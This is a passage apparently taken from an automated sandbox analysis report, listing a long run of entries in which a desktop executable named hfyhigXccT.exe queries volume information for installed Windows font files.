              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
